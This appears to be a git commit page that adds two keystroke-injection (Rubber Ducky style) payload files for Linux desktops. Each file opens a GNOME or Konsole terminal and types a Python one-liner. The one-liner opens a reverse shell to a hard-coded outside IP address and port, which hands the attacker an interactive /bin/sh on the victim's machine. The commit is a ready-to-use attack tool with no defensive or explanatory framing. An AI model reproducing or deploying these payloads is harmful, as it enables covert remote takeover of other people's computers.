python
This commit is contained in:
parent
a18b16b372
commit
38bb494956
8
linux-gnome-python.txt
Normal file
8
linux-gnome-python.txt
Normal file
@ -0,0 +1,8 @@
|
||||
ALT F2
|
||||
DELAY 500
|
||||
STRING gnome-terminal
|
||||
DELAY 200
|
||||
ENTER
|
||||
DELAY 5000
|
||||
STRING python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("45.92.178.34",31337));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
|
||||
ENTER
|
8
linux-konsole-python.txt
Normal file
8
linux-konsole-python.txt
Normal file
@ -0,0 +1,8 @@
|
||||
ALT F2
|
||||
DELAY 500
|
||||
STRING konsole
|
||||
DELAY 200
|
||||
ENTER
|
||||
DELAY 5000
|
||||
STRING python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("45.92.178.34",31337));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
|
||||
ENTER
|
Loading…
Reference in New Issue
Block a user